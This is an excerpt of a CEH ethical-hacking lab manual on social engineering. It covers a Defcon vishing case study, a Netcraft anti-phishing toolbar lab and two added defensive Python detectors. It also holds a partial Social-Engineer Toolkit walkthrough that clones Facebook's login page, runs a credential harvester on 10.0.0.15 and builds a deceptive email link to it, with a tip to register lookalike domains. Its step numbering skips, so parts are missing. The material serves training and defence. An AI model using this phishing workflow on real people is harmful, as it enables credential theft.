CEH Lab Manual
Social Engineering
Module 09

Module 09 - Social Engineering

Social Engineering

Social engineering is the art of convincing people to reveal confidential information.

Lab Scenario

Source: http://money.cnn.com/2012/.../technology/walmart-hack-defcon/index.htm

Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology, rather than by breaking in or using technical hacking techniques. The term "social engineering" can also mean an attempt to gain access to information, primarily through misrepresentation, and it often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack, and so won a coveted "black badge" in the "social engineering" contest at the Defcon hackers' conference in Las Vegas. In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:

■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-services provider
■ Its employee pay cycle
■ Its staff shift schedule
■ The time managers take their breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken to the extent of coughing up so much scam-worthy treasure. Calling from his sound-proofed booth at Defcon, MacDougall placed an "urgent" call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.

CEH Lab Manual Page 675 - Ethical Hacking and Countermeasures. Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract. "Darnell" said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations. But first, he told the store manager, he needed a thorough picture of how the store operated. In the conversation, which lasted about 10 minutes, "Darnell" described himself as a newly hired manager of government logistics. He also spoke offhand about the contract: "All I know is Wal-Mart can make a ton of cash off it," he said, then went on to talk about his upcoming visit, keeping up a "steady patter" about the project and life in Bentonville, Cowley writes.

As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit. The compliant manager obliged, plugging the address into his browser. When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years the contest has been held at Defcon.

Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers is verboten, given that Defcon has no great desire to bring the law down on its head. Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

MacDougall said, "Companies are way more aware about their security. They've got firewalls, intrusion detection, log-in systems going into place, so it's a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren't protecting, which is the people."

MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:

■ Never be afraid to say no. If something feels wrong, something is wrong.
■ An IT department should never be calling asking about operating systems, machines, passwords or email systems; they already know.
■ Set up an internal company security word of the day and don't give any information to anyone who doesn't know it.
■ Keep tabs on what's on the web. Companies inadvertently release tons of information online, including through employees' social media sites.

As an expert ethical hacker and penetration tester, you should circulate these best practices among the employees.

Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives

The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks

To carry out this lab, you need:
■ A computer running Windows Server 2012
■ A web browser with Internet access

Lab Duration

Time: 20 Minutes

Overview of Social Engineering

Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are unaware of the value of certain information they hold and are careless in protecting it.

Lab Tasks

Recommended labs to assist you in social engineering:
■ Social engineering
■ Detecting phishing using Netcraft
■ Detecting phishing using PhishTank

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB

Detecting Phishing Using Netcraft

Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.
Lab Scenario

By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer. Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies. Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

Phishers target the customers of banks and online payment services. They send messages to the bank customers using manipulated URLs and website forgery. The messages claim to be from a bank and look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details.

Not all phishing attacks require a fake website; messages that claim to be from a bank may tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller ID data to give the appearance that calls come from a trusted organization.

Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will learn to detect phishing using Netcraft.

Lab Objectives

This lab shows you how to recognize phishing sites in a web browser with the help of the Netcraft Toolbar. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks

Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

To carry out this lab you need:
■ Netcraft Toolbar, located at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
■ Alternatively, download the latest version of Netcraft Toolbar from http://toolbar.netcraft.com/
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
■ Administrative privileges to run the Netcraft toolbar

Lab Duration

Time: 10 Minutes

Overview of Netcraft Toolbar

Netcraft provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet. The toolbar shows this information for the site you are visiting and blocks pages that Netcraft has identified as phishing sites.

Lab Tasks

TASK 1: Anti-Phishing Toolbar

1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox. Launch the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.

FIGURE 1.1: Windows Server 2012 - Start Menu

2. Click the Mozilla Firefox app to launch the browser.

FIGURE 1.2: Windows Server 2012 - Start Menu Apps view

Note: You can also download the Netcraft toolbar from http://toolbar.netcraft.com

3. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser, or drag and drop the netcraft_toolbar-1.7-fx.xpi file into Firefox. In this lab, we are downloading the toolbar from the Internet.

4. In the Firefox browser, click Download the Netcraft Toolbar to install it as an add-on.
FIGURE 1.3: Netcraft toolbar download page

5. On the Install page of the Netcraft Toolbar site, click the Firefox image to continue with the installation.

FIGURE 1.4: Netcraft toolbar installation page

6. Click Allow to download the Netcraft Toolbar.

FIGURE 1.8: Netcraft Toolbar on the Mozilla Firefox web browser

12. When you visit a site, the following information displays in the Toolbar (unless the page has been blocked): Risk rating, Rank, and Flag.

13. Click Site Report to show the report for the site.

Note: Site Report links to a detailed Netcraft report for the site.

FIGURE 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a phishing page by the Netcraft Toolbar, you will see a warning dialog that looks similar to the one in the following figure. Note that the toolbar can only block pages already present in its phishing database; a freshly set up phishing site may not be blocked yet, so the absence of a warning is not proof that a site is legitimate.

15. Type, as an example: http://www.paypal.ca.6551secure7c.mx/images/cgi.bin

Note: Phishing site feeds: the toolbar checks visited URLs against a continuously updated, encrypted database of patterns that match phishing URLs reported by Netcraft Toolbar users.

FIGURE 1.10: Warning dialog for blocked site

16. If you trust that page, click Yes to open it; if you don't, click No (Recommended) to block that page.

17. If you click No, the following page will be displayed.

FIGURE 1.11: Web page blocked by Netcraft Toolbar

Lab Analysis

Document all the results and reports gathered during the lab.

Tool/Utility: Netcraft
Information Collected/Objectives Achieved: Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB

Questions

1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.
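The example URL above shows the structure the toolbar's blocklist catches: the brand the victim expects (paypal.ca) appears only in the subdomain labels, while the domain actually under the attacker's control is 6551secure7c.mx. The following Python script is an added example, not part of the lab manual and not Netcraft's code; it applies a few of the same structural checks (brand name outside the registrable domain, bare IP address as host, deep subdomain hierarchy, hit on a reported-phishing list) to constructed sample URLs. The brand list, the blocklist, the two-label public suffixes and the scoring thresholds are all assumptions made for the example.

```python
"""Heuristic phishing-URL checks of the kind an anti-phishing toolbar automates.

Added example (not part of the lab manual or of Netcraft's code). The brand
list, the blocklist, the suffix list and the score thresholds are constructed
for the example, not taken from any real feed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed: brand names a phisher would want to show in the visible URL.
KNOWN_BRANDS = {"paypal", "facebook", "gmail", "walmart"}

# Constructed stand-in for the toolbar's blocklist of reported phishing domains.
REPORTED_PHISHING_DOMAINS = {"6551secure7c.mx"}

# Constructed subset of two-label public suffixes; a real implementation
# would use the full Public Suffix List.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "com.mx", "co.jp"}


def registrable_domain(host: str) -> str:
    """Return the owner-controlled (registrable) domain of a hostname."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return host.lower()
    if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES and len(labels) >= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_ip_literal(host: str) -> bool:
    """True when the host part is a bare IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


@dataclass
class Verdict:
    url: str
    risk: int = 0                      # 0 = no signal, higher = riskier
    reasons: list[str] = field(default_factory=list)

    def flag(self, points: int, why: str) -> None:
        self.risk += points
        self.reasons.append(why)


def assess_url(url: str) -> Verdict:
    """Score a URL on structural phishing signals; never fetches anything."""
    v = Verdict(url)
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    if not host:
        v.flag(1, "no hostname")
        return v

    if is_ip_literal(host):
        v.flag(3, "host is a bare IP address")
        return v  # remaining checks only make sense for domain names

    reg = registrable_domain(host)
    if reg in REPORTED_PHISHING_DOMAINS:
        v.flag(5, f"{reg} is on the reported-phishing list")

    # Brand present in the host but not in the registrable domain:
    # the classic "paypal.ca.<attacker-domain>" construction.
    subdomain_part = host[: -len(reg)].rstrip(".")
    for brand in KNOWN_BRANDS:
        if brand in subdomain_part and brand not in reg:
            v.flag(4, f"brand '{brand}' appears only in the subdomain of {reg}")

    if host.count(".") >= 4:
        v.flag(1, "unusually deep subdomain hierarchy")
    return v


def is_suspicious(url: str, threshold: int = 3) -> bool:
    """True when the accumulated risk score meets the (assumed) threshold."""
    return assess_url(url).risk >= threshold


if __name__ == "__main__":
    # Constructed samples: the manual's example phishing URL plus controls.
    for sample in [
        "http://www.paypal.ca.6551secure7c.mx/images/cgi.bin",
        "https://www.paypal.com/signin",
        "http://10.0.0.15/",
        "https://login.facebook.com/login.php",
    ]:
        verdict = assess_url(sample)
        print(f"{verdict.risk:2d} {sample}  {'; '.join(verdict.reasons) or 'no signals'}")
```

The manual's example URL trips three signals (blocklisted domain, brand outside the registrable domain, deep hierarchy), while the genuine PayPal and Facebook login URLs score zero; a bare IP such as the harvester address used later in this module is flagged on its own. Heuristics like these are a complement to a reported-URL database, not a substitute: a phisher who registers a plausible-looking fresh domain defeats both until the site is reported.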
FIGURE 3.4: Social Engineering Attacks menu

6. In the next set of menus that appears, type 3 and press Enter to select the Credential Harvester Attack Method.

Note: The Credential Harvester Method uses web cloning of a website that has a username and password field and harvests all the information posted to the website.

Note: The Web Jacking Attack Method utilizes iframe replacements to make the highlighted URL link appear legitimate; however, when clicked, a window pops up and is then replaced with the malicious link. You can edit the link replacement settings in set_config if it is too slow or too fast.

Note: The Multi-Attack method will add a combination of attacks through the web attack menu. For example, you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate
  99) Return to Main Menu

  set:webattack>3

FIGURE 3.5: Website Attack Vectors menu

7. Now, type 2 and press Enter to select the Site Cloner option from the menu.
Note: The Site Cloner is used to clone a website of your choice.

  The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.
  The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.
  The third method allows you to import your own website; note that you should only have an index.html when using the import website functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

  set:webattack>2

FIGURE 3.6: Credential Harvester Attack menu

8. Type the IP address of your BackTrack virtual PC at the prompt IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15.

Note: The tabnabbing attack method is used when a victim has multiple tabs open. When the user clicks the link, the victim is presented with a "Please wait while the page loads" page. When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time, thinks they were signed out of their email program or their business application, and types the credentials in. When the credentials are entered, they are harvested and the user is redirected back to the original website.

  [-] Credential harvester will allow you to utilize the clone capabilities within SET
  [-] to harvest credentials or parameters from a website as well as place them into a report
  [-] This option is used for what IP the server will POST to.
  [-] If you're using an external IP, use your external IP for this
  set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15

FIGURE 3.7: Providing the IP address in Harvester/Tabnabbing

9. Now, you will be prompted for a URL to be cloned. Type the desired URL at Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.
Note: The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature in version 0.7.

  set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
  [*] SET supports both HTTP and HTTPS
  [-] Example: http://www.thisisafakesite.com
  set:webattack> Enter the url to clone:www.facebook.com
FIGURE 3.8: Providing the URL to be cloned

10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.

11. It will start the Credential Harvester.

Note: If you're doing a penetration test, register a name that's similar to the victim's; for Gmail you could register gma1l.com (notice the 1), something similar that can mislead the user into thinking it's the legitimate site.

  set:webattack> Enter the url to clone:www.facebook.com

  [*] Cloning the website: https://login.facebook.com/login.php
  [*] This could take a little bit...

  The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
  [*] I have read the above message.
  Press <return> to continue

FIGURE 3.9: SET Website Cloning

12. Leave the Credential Harvester Attack running to capture information from the victim's machine.
Note: When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So, for example, if you're cloning gmail.com, the URL when hovered over would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious web server. Remember you can change the timing of the webjacking attack in the config/set_config flags.

  [*] Social-Engineer Toolkit Credential Harvester Attack
  [*] Credential Harvester is running on port 80
  [*] Information will be displayed to you as it arrives below:

FIGURE 3.10: SET Credential Harvester Attack

13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her into clicking a link that browses to the IP address.

14. For this demo, launch your web browser on the BackTrack machine and open your favorite email service; in this example we have used www.gmail.com. Log in to your Gmail account and compose an email.

Note: Most of the time they won't even notice the IP, but it's just another way to ensure it goes on without a hitch. Once the victim enters the username and password in the fields, you will notice that we can intercept the credentials.

FIGURE 3.11: Composing an email in Gmail

15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.

FIGURE 3.12: Linking the fake URL to the actual URL

16. In the Edit Link window, first type the actual address in the Web address field under the Link to option, and then type the fake URL in the Text to display field. In this example, the web address we have used is http://10.0.0.15 and the text to display is www.facebook.com/Rini TGIF. Click OK. The mismatch between the displayed text and the real target is exactly what a careful recipient can spot by hovering over the link before clicking it.

FIGURE 3.13: Edit Link window

17. The fake URL should appear in the email body, as shown in the following screenshot.

Note: The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

[Screenshot: Gmail compose window showing the message to Sam with the fake www.facebook.com/Rini TGIF link in the body]
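Steps 15 to 17 produce the classic phishing lure: an anchor whose visible text names www.facebook.com while its href points at the harvester's bare IP. The following Python script is an added example, not part of the lab manual and not code from SET or Gmail; it parses the HTML of a message and reports every anchor whose visible text names a host different from the href's host, or whose href targets a bare IP address. The sample email body is constructed for the example (its link matches the one built in the lab), and the rule that a displayed host may be a parent of the real host (facebook.com vs. www.facebook.com) is an assumption about what counts as a benign difference.

```python
"""Detect link-text/href mismatches in an HTML email body.

Added example (not part of the lab manual, SET or Gmail). The sample HTML
below is constructed; the attacker IP matches the one used in the lab.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Something that looks like a hostname or URL in visible link text,
# e.g. "www.facebook.com/Rini TGIF" or "https://gmail.com".
_HOSTLIKE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


@dataclass
class LinkFinding:
    text: str
    href: str
    reason: str


def host_of(url: str) -> str:
    """Lower-cased host of a URL; scheme-less hrefs are treated as http."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return (parts.hostname or "").lower()


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


class _AnchorCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href: str | None = None
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def find_deceptive_links(html: str) -> list[LinkFinding]:
    """Return one finding per deceptive signal on each anchor in `html`."""
    parser = _AnchorCollector()
    parser.feed(html)
    findings: list[LinkFinding] = []
    for text, href in parser.links:
        target = host_of(href)
        if is_ip_literal(target):
            findings.append(LinkFinding(text, href, f"href points at bare IP {target}"))
        m = _HOSTLIKE.search(text)
        if m:
            shown = m.group(1).lower()
            # "facebook.com" shown for a link to "www.facebook.com" is benign
            # (assumed); anything else is a mismatch worth reporting.
            if shown != target and not target.endswith("." + shown):
                findings.append(LinkFinding(
                    text, href, f"text shows {shown} but href goes to {target or '(none)'}"))
    return findings


# Constructed sample: the kind of body the lab's steps 15-17 produce.
SAMPLE_EMAIL_HTML = """
<p>Hello Sam,</p>
<p>Please click this link to view the weekend party pictures at TGIF:
<a href="http://10.0.0.15">www.facebook.com/Rini TGIF</a></p>
<p>Regards,<br>Rini</p>
<p><a href="https://www.facebook.com/">www.facebook.com</a></p>
"""

if __name__ == "__main__":
    for f in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(f"[!] {f.reason}  (text={f.text!r}, href={f.href!r})")
```

On the sample body the lure link is reported twice (bare-IP target, and displayed host differing from the real host) while the genuine Facebook link at the bottom is silent. The same check is what a mail gateway or a browser's hover tooltip gives a user; the lab's note that "most of the time they won't even notice the IP" is precisely the gap this closes.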